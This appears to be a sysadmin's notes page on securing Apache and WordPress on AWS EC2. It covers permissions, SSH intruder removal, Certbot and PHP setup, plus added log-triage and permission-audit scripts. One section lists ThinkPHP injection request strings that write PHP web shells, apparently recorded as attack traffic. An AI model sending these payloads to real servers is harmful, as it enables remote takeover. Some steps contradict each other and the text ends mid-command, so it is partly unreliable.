Stopping “connect” attacks in apache (solution)

Then add the following right after it and restart apache to activate.

# Second, we configure the "default" Location to restrict the methods
# to stop CONNECT method attacks.
Order allow,deny
Deny from all

I don’t like the idea of my server responding to requests for random hostnames, even if it serves local content. How can I deny these requests?

<VirtualHost *:80>
  ServerName default.only
  <Location />
    Order allow,deny
    Deny from all
  </Location>
</VirtualHost>

How to kick out an illegal SSH user from your Unix server?

Run who with the -u flag; the PID is the number off to the right:

> who -u
ec2-user pts/1        2019-11-14 16:52 00:02   16035 (
Look up the process ID of the shell their TTY is connected to:

> ps t
PID   TTY      STAT   TIME COMMAND
16035 pts/1    Ss     0:00 zsh

Laugh at their impending disconnection (this step is optional, but encouraged) 
> echo "HAHAHAHAHAHAHAHA" | write ec2-user pts/1 

Kill the corresponding process:

> kill -9 16035

WordPress Hacker Techniques Injection

\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=atpko.php&vars[1][]=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');
\think\template\driver\file/write&cacheFile=kolsk.php&content=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');
\think\template\driver\file/write&cacheFile=kolsk.php&content=
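A defender-side triage of the request strings listed above, as an added example that is not part of the original page: it pulls the matching lines out of an access log, counts them per client, extracts the file names the requests tried to create, and checks whether any of them exist under the web root. The function names, the combined log format, and the sample log lines (constructed, with payload bodies redacted) are assumptions.

```bash
#!/usr/bin/env bash
# Added example: triage an access log for the request strings listed above.
# Sample lines are constructed (documentation IP ranges, payload bodies redacted).

# Apache writes a backslash to its log as "\\"; clients may also send it as %5C.
SEP='(\\+|%5[Cc])'
PROBE_RE="think${SEP}(app/invokefunction|template${SEP}driver${SEP}file/write)"

sample_log() {
  cat <<'EOF'
203.0.113.7 - - [14/Nov/2019:16:40:01 +0000] "GET /\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=atpko.php&vars[1][]=REDACTED HTTP/1.1" 404 196
203.0.113.7 - - [14/Nov/2019:16:40:02 +0000] "GET /\think\template\driver\file/write&cacheFile=kolsk.php&content=REDACTED HTTP/1.1" 404 196
198.51.100.9 - - [14/Nov/2019:16:41:10 +0000] "GET /wp-login.php HTTP/1.1" 200 1234
EOF
}

# Log lines that carry one of the probe strings. $1 = access log path
probe_lines() { grep -E "$PROBE_RE" "$1"; }

# Hit count and source address per client, busiest first.
probe_sources() { probe_lines "$1" | awk '{print $1}' | sort | uniq -c | sort -rn; }

# File names the requests tried to create.
dropped_files() {
  probe_lines "$1" |
    grep -oE '(cacheFile=|vars\[1\]\[\]=)[A-Za-z0-9_.-]+\.php' |
    sed 's/^.*=//' | sort -u
}

# Any of those names that actually exist under the web root ($2).
found_in_webroot() {
  dropped_files "$1" | while IFS= read -r name; do
    find "$2" -type f -name "$name" -print
  done
}

# Demo run against the constructed sample and an empty scratch web root.
demo_dir=$(mktemp -d)
sample_log > "$demo_dir/access_log"
mkdir "$demo_dir/htdocs"
echo "probe sources:"; probe_sources "$demo_dir/access_log"
echo "files to look for:"; dropped_files "$demo_dir/access_log"
echo "present in web root:"; found_in_webroot "$demo_dir/access_log" "$demo_dir/htdocs"
```

An empty "present in web root" list means none of the requested file names were found on disk; any path printed there is a file to inspect and remove.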

Files Permission – Unix Server

  • Folders – 755
  • Files – 644
  • wp-config.php – 600
  • .htaccess – 644, or 600

Unix command for directories 755

find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755

Unix command for files 644

find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644
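An audit-then-fix version of the scheme above, as an added example that is not part of the original page: a blanket chmod 0644 over every file also resets wp-config.php to 644, so this version reports deviations first and then applies the per-file exceptions from the list. The function names and the scratch tree are assumptions constructed for the demonstration.

```bash
#!/usr/bin/env bash
# Added example: audit and repair a WordPress tree against the scheme above
# (folders 755, files 644, wp-config.php 600, .htaccess 644 or 600).

# List every path that deviates, one "REASON path" pair per line. $1 = tree root
perm_audit() {
  find "$1" -type d ! -perm 0755 -print | sed 's/^/DIR_NOT_755 /'
  find "$1" -type f ! -name wp-config.php ! -name .htaccess ! -perm 0644 -print |
    sed 's/^/FILE_NOT_644 /'
  find "$1" -type f -name wp-config.php ! -perm 0600 -print | sed 's/^/WPCONFIG_NOT_600 /'
  find "$1" -type f -name .htaccess ! -perm 0644 ! -perm 0600 -print |
    sed 's/^/HTACCESS_NOT_644_OR_600 /'
}

# Apply the scheme. Unlike a blanket "chmod 0644" over every file, this keeps
# wp-config.php at 600 and leaves an .htaccess that is already 600 alone.
perm_fix() {
  find "$1" -type d -exec chmod 0755 {} +
  find "$1" -type f ! -name wp-config.php ! -name .htaccess -exec chmod 0644 {} +
  find "$1" -type f -name wp-config.php -exec chmod 0600 {} +
  find "$1" -type f -name .htaccess ! -perm 0644 ! -perm 0600 -exec chmod 0644 {} +
}

# Constructed scratch tree with three deliberate deviations:
# a 777 uploads folder, a 666 upload, and wp-config.php at 644.
make_sample_tree() {
  t=$(mktemp -d)
  mkdir -p "$t/wp-content/uploads"
  : > "$t/index.php"; : > "$t/wp-config.php"; : > "$t/.htaccess"
  : > "$t/wp-content/uploads/a.jpg"
  chmod 0755 "$t" "$t/wp-content"; chmod 0777 "$t/wp-content/uploads"
  chmod 0644 "$t/index.php" "$t/wp-config.php"
  chmod 0600 "$t/.htaccess"; chmod 0666 "$t/wp-content/uploads/a.jpg"
  printf '%s\n' "$t"
}

tree=$(make_sample_tree)
echo "before:"; perm_audit "$tree"
perm_fix "$tree"
echo "after: $(perm_audit "$tree" | wc -l) deviation(s)"
```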

Find hacked files

grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'

How to configure SSL on Apache Web Server?

Refer to

Free SSL – Let’s Encrypt


  sudo mv certbot-auto /usr/local/bin/certbot-auto
  sudo chown root /usr/local/bin/certbot-auto
  sudo chmod 0755 /usr/local/bin/certbot-auto
  sudo /usr/local/bin/certbot-auto --apache

(1) modify –> /etc/httpd/conf.d/ssl.conf

(2) make sure you close HTTP via the AWS inbound rules and ACL


  sudo /usr/local/bin/certbot-auto --apache

Activate htaccess

<Directory /var/www/xxxx>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Require all granted
</Directory>

Proper Directory and file permission

Directories 775
Files 664

Unix command for directories 755

find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755

Unix command for files 644

find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644

Unix User Apache

sudo chown -R apache:apache .

Find hacked files

grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'

Create instance ec2 with ssh access

(1) create ec2 instance

(2) create VPC. Make sure to have a public IPv4 DNS

Get your VPC ID from your EC2 dashboard.
Go to VPC dashboard. Select your VPC with VPC ID.
Click on Actions and Select "Edit DNS Hostnames".
Select Yes and click Save.

Now you can find Public DNS IPv4 value in EC2 dashboard.

(3) create subnet – 250 available IP addresses; make sure to auto-assign IPv4

(4) create internet gateway

(5) create route tables – ADD to internet gateway

Install without verification

yum update -y

apache web server

    <VirtualHost *:80>
      DocumentRoot "/www/docs/"
      ServerName ec2-3-88-63-157.compute-1.amazonaws.com
      ErrorLog "logs/"
      TransferLog "logs/"
    </VirtualHost>



user@webserver:~$ wget
user@webserver:~$ sudo mv certbot-auto /usr/local/bin/certbot-auto
user@webserver:~$ sudo chown root /usr/local/bin/certbot-auto
user@webserver:~$ sudo chmod 0755 /usr/local/bin/certbot-auto
user@webserver:~$ /usr/local/bin/certbot-auto --help

/usr/local/bin/certbot-auto --debug --apache certonly -d

Install new php package

sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2
sudo amazon-linux-extras enable php7.3
sudo yum -y install php-cli php-pdo php-fpm php-json php-mysqlnd

Start the Apache web server.

[ec2-user ~]$ sudo systemctl start httpd

Use the systemctl command to configure the Apache web server to start at each system boot.

[ec2-user ~]$ sudo systemctl enable httpd

You can verify that httpd is on by running the following command:

[ec2-user ~]$ sudo systemctl is-enabled httpd

To ensure that all of your software packages are up to date, perform a quick software update on your instance. This process may take a few minutes, but it is important to make sure that you have the latest security updates and bug fixes.

The -y option installs the updates without asking for confirmation. If you would like to examine the updates before installing, you can omit this option.

[ec2-user ~]$ sudo yum update -y

Install the lamp-mariadb10.2-php7.2 and php7.2 Amazon Linux Extras repositories to get the latest versions of the LAMP MariaDB and PHP packages for Amazon Linux 2.

[ec2-user ~]$ sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 p